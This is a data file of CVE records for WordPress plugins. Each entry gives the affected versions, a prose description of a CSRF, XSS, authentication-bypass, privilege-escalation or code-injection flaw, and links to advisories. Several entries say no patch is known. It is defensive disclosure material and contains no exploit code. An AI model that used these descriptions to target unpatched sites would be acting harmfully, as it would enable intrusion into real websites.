{"CVE_ID":"CVE-2023-3366","slug":"multiparcels-shipping-for-woocommerce","description":"The MultiParcels Shipping For WooCommerce WordPress plugin before 1.15.2 does not have CRSF check when deleting a shipment, allowing attackers to make any logged in user, delete arbitrary shipment via a CSRF attack","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b2f06223-9352-4227-ae94-32061e2c5611\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b2f06223-9352-4227-ae94-32061e2c5611\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2440","slug":"userpro","versionImpact":"5.1.1","description":"The UserPro plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 5.1.1. This is due to missing nonce validation in the 'admin_page', 'userpro_verify_user' and 'verifyUnverifyAllUsers' functions. This makes it possible for unauthenticated attackers to modify the role of verified users to elevate verified user privileges to that of any user such as 'administrator' via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/73600498-f55c-4b8e-a625-4f292e58e0ee?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/73600498-f55c-4b8e-a625-4f292e58e0ee?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/userpro-user-profiles-with-social-login\\\/5958681\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/userpro-user-profiles-with-social-login\\\/5958681\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1989","slug":"sassy-social-share","versionImpact":"3.3.58","description":"The Social Sharing Plugin \u2013 Sassy Social Share plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'Sassy_Social_Share' shortcode in all versions up to, and including, 3.3.58 due to insufficient input sanitization and output escaping on user supplied attributes such as 'url'. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bdceb07a-87d2-4708-b76b-5a8fcfff0818?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bdceb07a-87d2-4708-b76b-5a8fcfff0818?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sassy-social-share\\\/trunk\\\/includes\\\/class-sassy-social-share-shortcodes.php#L228\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sassy-social-share\\\/trunk\\\/includes\\\/class-sassy-social-share-shortcodes.php#L228\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sassy-social-share\\\/trunk\\\/includes\\\/class-sassy-social-share-shortcodes.php#L308\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sassy-social-share\\\/trunk\\\/includes\\\/class-sassy-social-share-shortcodes.php#L308\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sassy-social-share\\\/trunk\\\/public\\\/class-sassy-social-share-public.php#L513\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sassy-social-share\\\/trunk\\\/public\\\/class-sassy-social-share-public.php#L513\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sassy-social-share\\\/trunk\\\/includes\\\/class-sassy-social-share-sharing-networks.php#L65\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sassy-social-share\\\/trunk\\\/includes\\\/class-sassy-social-share-sharing-networks.php#L65\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3044857%40sassy-social-share%2Ftrunk&old=3038976%40sassy-social-share%2Ftrunk&sfp_email=&sfph_mail=#file6\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3044857%40sassy-social-share%2Ftrunk&old=3038976%40sassy-social-share%2Ftrunk&sfp_email=&sfph_mail=#file6\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3639","slug":"addons-for-elementor","versionImpact":"8.3.7","description":"The Elementor Addons by Livemesh plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's  Posts Grid widget in all versions up to, and including, 8.3.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9729ccc9-e3f1-4096-8430-22998b386cec?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9729ccc9-e3f1-4096-8430-22998b386cec?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/addons-for-elementor\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/addons-for-elementor\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10233","slug":"sms-alert","versionImpact":"3.7.5","description":"The SMS Alert Order Notifications \u2013 WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's sa_subscribe shortcode in all versions up to, and including, 3.7.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c923d1d6-04c6-4ea2-a69e-041fea1e280a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c923d1d6-04c6-4ea2-a69e-041fea1e280a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sms-alert\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sms-alert\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3175629\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3175629\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13155","slug":"unlimited-elements-for-elementor","versionImpact":"1.5.140","description":"The Unlimited Elements For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Transparent Split Hero widget in all versions up to, and including, 1.5.140 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Note: Since the widget code isn't part of the code base, to apply the patch, the affected widget: Transparent Split Hero must be deleted and reinstalled manually.","refs":"[{\"url\":\"https:\\\/\\\/unlimited-elements.com\\\/change-log\\\/\",\"name\":\"https:\\\/\\\/unlimited-elements.com\\\/change-log\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/unlimited-elements-for-elementor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/unlimited-elements-for-elementor\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/63ba4880-9fbb-42e3-a8db-8115eb832b13?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/63ba4880-9fbb-42e3-a8db-8115eb832b13?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10321","slug":"widgetkit-for-elementor","versionImpact":"2.5.4","description":"The All-in-One Addons for Elementor \u2013 WidgetKit plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.5.4 in elements\/advanced-tab\/template\/view.php. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, and draft template data.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/widgetkit-for-elementor\\\/trunk\\\/elements\\\/advanced-tab\\\/template\\\/view.php#L68\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/widgetkit-for-elementor\\\/trunk\\\/elements\\\/advanced-tab\\\/template\\\/view.php#L68\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2e470017-c453-435d-8342-66874a794537?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2e470017-c453-435d-8342-66874a794537?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3906","slug":"integracao-entre-eduzz-e-wc-powers","versionImpact":"1.7.5","description":"The Integra\u00e7\u00e3o entre Eduzz e Woocommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'wep_opcoes' function in all versions up to, and including, 1.7.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to edit the default registration role within the plugin's registration flow to Administrator, which allows any user to create an Administrator account.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/integracao-entre-eduzz-e-wc-powers\\\/trunk\\\/admin\\\/class-wep-admin.php#L120\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/integracao-entre-eduzz-e-wc-powers\\\/trunk\\\/admin\\\/class-wep-admin.php#L120\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/integracao-entre-eduzz-e-wc-powers\\\/trunk\\\/include\\\/class-wep-webhook.php#L7\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/integracao-entre-eduzz-e-wc-powers\\\/trunk\\\/include\\\/class-wep-webhook.php#L7\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/integracao-entre-eduzz-e-wc-powers\\\/trunk\\\/wep-powers.php#L19\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/integracao-entre-eduzz-e-wc-powers\\\/trunk\\\/wep-powers.php#L19\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eb85ed32-c391-45d2-9e86-cb97009210cd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eb85ed32-c391-45d2-9e86-cb97009210cd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5534","slug":"esv-bible-shortcode-for-wordpress","versionImpact":"1.0.2","description":"The ESV Bible Shortcode for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'esv' shortcode in all versions up to, and including, 1.0.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/esv-bible-shortcode-for-wordpress\\\/tags\\\/1.0.2\\\/esv-shortcode.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/esv-bible-shortcode-for-wordpress\\\/tags\\\/1.0.2\\\/esv-shortcode.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/40e8dc83-6417-4881-a9a3-15525c5cc6ba?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/40e8dc83-6417-4881-a9a3-15525c5cc6ba?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4761","slug":"baw-post-views-count","versionImpact":"3.0.2","description":"The Post Views Count WordPress plugin through 3.0.2 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ad163020-8b9c-42cb-a55f-b137b224bafb\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ad163020-8b9c-42cb-a55f-b137b224bafb\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4375","slug":"usc-e-shop","versionImpact":"2.2.7","description":"The Welcart e-Commerce plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the usces_download_system_information() function in versions up to, and including, 2.2.7. This makes it possible for authenticated attackers to download information including WordPress settings, plugin settings, PHP settings and server settings.","refs":"[{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-welcart-e-commerce-plugin-fixed-vulnerabilities\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-welcart-e-commerce-plugin-fixed-vulnerabilities\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d82e856b-c8c9-4139-ad54-89368e3b7125?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d82e856b-c8c9-4139-ad54-89368e3b7125?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4386","slug":"wp-security-questions","versionImpact":"1.0.5","description":"The WP Security Question plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.0.5. This is due to missing or incorrect nonce validation on the save() function. This makes it possible for unauthenticated attackers to modify the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/23f9d758-4b5e-44e5-9f58-a37b01c4ffdb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/23f9d758-4b5e-44e5-9f58-a37b01c4ffdb?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-security-questions\\\/trunk\\\/modules\\\/settings\\\/model.settings.php#L34\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-security-questions\\\/trunk\\\/modules\\\/settings\\\/model.settings.php#L34\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2438","slug":"userpro","versionImpact":"5.1.0","description":"The UserPro plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 5.1.0. This is due to missing or incorrect nonce validation on the 'userpro_save_userdata' function. This makes it possible for unauthenticated attackers to update the user meta and inject malicious JavaScript via a forged request, granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7d30adc5-27a5-4549-84fc-b930f27f03e5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7d30adc5-27a5-4549-84fc-b930f27f03e5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/userpro-user-profiles-with-social-login\\\/5958681\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/userpro-user-profiles-with-social-login\\\/5958681\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3638","slug":"addons-for-elementor","versionImpact":"8.3.7","description":"The Elementor Addons by Livemesh plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Marquee Text Widget, Testimonials Widget, and Testimonial Slider widgets in all versions up to, and including, 8.3.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/58dfd766-7156-4aec-b8db-76908b775ba0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/58dfd766-7156-4aec-b8db-76908b775ba0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-elementor\\\/trunk\\\/templates\\\/addons\\\/marquee-text\\\/content.php#L24\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-elementor\\\/trunk\\\/templates\\\/addons\\\/marquee-text\\\/content.php#L24\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-elementor\\\/trunk\\\/templates\\\/addons\\\/marquee-text\\\/content.php#L28\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-elementor\\\/trunk\\\/templates\\\/addons\\\/marquee-text\\\/content.php#L28\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9073","slug":"gtg-advanced-blocks","versionImpact":"1.1.3","description":"The GutenGeek Free Gutenberg Blocks for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.1.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f1c68f9d-a026-4cef-82e6-25949a3d59ad?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f1c68f9d-a026-4cef-82e6-25949a3d59ad?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gtg-advanced-blocks\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gtg-advanced-blocks\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9822","slug":"pedalo-connector","versionImpact":"2.0.5","description":"The Pedalo Connector plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 2.0.5. This is due to insufficient restriction on the 'login_admin_user' function. This makes it possible for unauthenticated attackers to log to the first user, who is usually the administrator, or if it does not exist, then to the first administrator.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6ab0d342-bfa7-4760-b839-37c3354414ca?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6ab0d342-bfa7-4760-b839-37c3354414ca?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pedalo-connector\\\/tags\\\/2.0.5\\\/public\\\/class-pedalo_connector-public.php#L118\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pedalo-connector\\\/tags\\\/2.0.5\\\/public\\\/class-pedalo_connector-public.php#L118\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10185","slug":"streamweasels-youtube-integration","versionImpact":"1.3.2","description":"The StreamWeasels YouTube Integration plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's sw-youtube-embed shortcode in all versions up to, and including, 1.3.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/41f6b12e-49bb-4bee-bbde-ce4e5ebd4cad?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/41f6b12e-49bb-4bee-bbde-ce4e5ebd4cad?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/streamweasels-youtube-integration\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/streamweasels-youtube-integration\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3176030\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3176030\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12167","slug":"ultimate-shortcodes-creator","versionImpact":"2.2.0","description":"The Shortcodes Blocks Creator Ultimate plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the '_wpnonce' parameter in all versions up to, and including, 2.2.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-shortcodes-creator\\\/trunk\\\/admin\\\/class-admin.php#L111\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-shortcodes-creator\\\/trunk\\\/admin\\\/class-admin.php#L111\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/db6ccadb-5e90-4234-88cc-28241846acea?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/db6ccadb-5e90-4234-88cc-28241846acea?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13422","slug":"seo-blogger-to-wordpress-301-redirector","versionImpact":"0.4.8","description":"The SEO Blogger to WordPress Migration using 301 Redirection plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'url' parameter in all versions up to, and including, 0.4.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-blogger-to-wordpress-301-redirector\\\/trunk\\\/seo-blogger-to-wordpress.php#L356\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-blogger-to-wordpress-301-redirector\\\/trunk\\\/seo-blogger-to-wordpress.php#L356\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a3e095b5-9c0b-45ac-a78d-e50feda348cb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a3e095b5-9c0b-45ac-a78d-e50feda348cb?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-25077","slug":"easy-chart-builder","versionImpact":"1.3","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in dugbug Easy Chart Builder for WordPress allows Stored XSS. This issue affects Easy Chart Builder for WordPress: from n\/a through 1.3.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/easy-chart-builder\\\/vulnerability\\\/wordpress-easy-chart-builder-for-wordpress-plugin-1-3-stored-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/easy-chart-builder\\\/vulnerability\\\/wordpress-easy-chart-builder-for-wordpress-plugin-1-3-stored-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3491","slug":"add-custom-page-template","versionImpact":"2.0.1","description":"The Add custom page template plugin for WordPress is vulnerable to PHP Code Injection leading to Remote Code Execution in all versions up to, and including, 2.0.1 via the 'acpt_validate_setting' function. This is due to insufficient sanitization of the 'template_name' parameter. This makes it possible for authenticated attackers, with Administrator-level access and above, to execute code on the server.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/add-custom-page-template\\\/trunk\\\/index.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/add-custom-page-template\\\/trunk\\\/index.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9c2d97c4-b166-4d1f-8042-d0362e650c62?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9c2d97c4-b166-4d1f-8042-d0362e650c62?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
